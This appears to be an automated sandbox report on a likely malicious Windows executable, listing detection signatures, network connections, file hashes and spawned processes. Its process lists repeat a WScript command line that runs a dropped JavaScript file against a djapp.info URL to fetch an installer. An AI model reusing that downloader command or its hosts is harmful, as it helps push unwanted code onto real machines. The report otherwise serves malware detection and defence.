Analysis Overview
SHA256
4e72ecde6fc0994b4fb69adb5de8414e82e6ed2200d1ab95f90f4f67870a4158
Threat Level: Likely malicious
The file a3578237b4c2099fce51877bea51b575_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
Unsigned PE
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-13 01:21
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-13 01:21
Reported
2024-06-13 01:24
Platform
win7-20240611-en
Max time kernel
121s
Max time network
125s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7407.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7407.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7407.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7407.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7407.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7407.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7407.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7407.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7407.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7407.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1704 -s 564
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.94.41.167:80 | bi.downthat.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 3.94.41.167:80 | bi.downthat.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf7407.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A8DU897P\domain_profile[1].htm
| MD5 | 5067c4137d0e2aeb04b2cb6d571ba641 |
| SHA1 | ae7e5dc6130660a82c32932526491586a8072f02 |
| SHA256 | 3a4d899793104023406b6174b2871fd296b1751f8c60b386d0dfe136b25e5edf |
| SHA512 | 5f33490e0991efee176996984312293a633ea9b13bcb181a4ce33615df2eb3cb0b352e9045aced44eeaca1622d13377c93302988c5937cf80a3b5b83c09e68c1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\A7BJXE3M.txt
| MD5 | 64561c88285ad436baf71e2e91b740bf |
| SHA1 | a6c2177ad4b561ce3028e9fd4128539e7c68ee9b |
| SHA256 | 9a29c2ebe009768b833991c7fa12e345362ece90248e2f4a6aec98084d2ec064 |
| SHA512 | b97d8bcc6eeea7a1fcdff5f88552beaa2f9da8132d370187fc5e29b87649f2f6336794e16d9862ce416e72cb4f92b1a848392acd5ef70be49fc1412bb36e30f0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 6a46bf7e6fa04e15c2a5dddc3f1931d0 |
| SHA1 | 6124fa99b0ec157864a8e4911a29fc53604c5633 |
| SHA256 | a41f8b4c6f68a74991522e8c2057213e640ca5831f63b949ef93d1c131de5ae7 |
| SHA512 | 41208e38a0c3e9b215e207f241f2841082749df7b4f52a7111a376ff2d2ded30ff9875c84ff0da9929bb2c5cb9c92b3a45ce8d170904f32c3d03618ae0eebbd9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | d3049f1a4b143f13261e38abab901109 |
| SHA1 | 1810917619ef7b98f40697c12f35a75575665f8f |
| SHA256 | 69df6863aa24aedecf107a7e2e0353d592c52a5905cc2833d824c2298733e9d6 |
| SHA512 | 6af844057e960d6f4165f297891b676492281fc4abdd7346a220b1972124fabe2a9e0f7b3825c9f67c1ed885262cf6fb994c4dcd607c1981005291a240b6e958 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 38a1b67e0dd6526f808692eaba428abd |
| SHA1 | 270c1640da5ec34669e10e9690ad2625dff6300d |
| SHA256 | f8a8a254316502d07a90b14a873a1dabd062d70aadf76ef63a963388e54af01d |
| SHA512 | 645bbc173ad4bf641f9e1add5bbf4a6eafc3f7e26ee89acfa32feb6ff5b3fd5f6765aef7769cca21d973b0c32119f6ccc54b7ec14652a24a1bab9d5364fe80a6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 46444726cc859076c5eed090517a4527 |
| SHA1 | 2ec3da28deed6cae47594c55491792ebf8eb5fca |
| SHA256 | 4eed62c9756e937aba86ab57e266546e0f2866ee7d5119a3e5d36d117f2b3f3c |
| SHA512 | 192c3e8fa4662057e6362b5cd8cc782f2d9d6e161550fe1baf63299245613b0262eaacbaecf32709f305b00f85eee6f3871b8a73e7d34ce8794bf31fa7194afc |
C:\Users\Admin\AppData\Local\Temp\CabBC4D.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z5LT06Y3\domain_profile[1].htm
| MD5 | 3c14c10590e27ed2a6c28705c2d45f1f |
| SHA1 | b56dd816b0d87d2cbf93ddcfe347ad1a66ec7962 |
| SHA256 | 810a202a398e826b570c86bccb7db6772c384120d7b0fb7416796abd0ccf580f |
| SHA512 | 61462ae6eb1fbf3b64d7b63911423edeef77be074a9a8d32502926a89386fa65147679666ad2b5c58ad5305e1c311ff39c8b2e3e303e716a7cb5cb79c5be74b4 |
C:\Users\Admin\AppData\Local\Temp\TarD4DD.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A8DU897P\domain_profile[1].htm
| MD5 | 2fc1dcca1ae8f276fc0d88752492998e |
| SHA1 | 45dd4baeabd9e9cef6614bf6d26a3361846dcd1b |
| SHA256 | 1bd8aca8681cfdeff42acc5353afccf2037ca40d36e5b6fd99cbe3be7dd07e1e |
| SHA512 | eab0e5b3bbcac77dc126549255108da13dc0252f22a5cc41e26862ff6d01cc51b9879ff0551e5ca48f609bb047c34f408b1aa207c8e115f8035ab402e2201917 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z5LT06Y3\domain_profile[1].htm
| MD5 | 4025bb9bae0273b2d30376026dbbd1d3 |
| SHA1 | ecdbc036d96efad52d3f96eeaf1ae8fb7f2170e1 |
| SHA256 | bfcc4c3011dd726b0d01243fba3219680e6cd6fb788846826854b265720dff58 |
| SHA512 | edc6651494cd77c92cd27434ed1c4eb981847dec9d4a9683e57d82b983959356a1adbc67d622d3f9f49df9643b4623d5f7d1b937449013b53941b9cb3cdbbcff |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-13 01:21
Reported
2024-06-13 01:24
Platform
win10v2004-20240508-en
Max time kernel
100s
Max time network
90s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4DB2.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4DB2.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4DB2.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4DB2.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4DB2.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3712 -ip 3712
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 1452
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |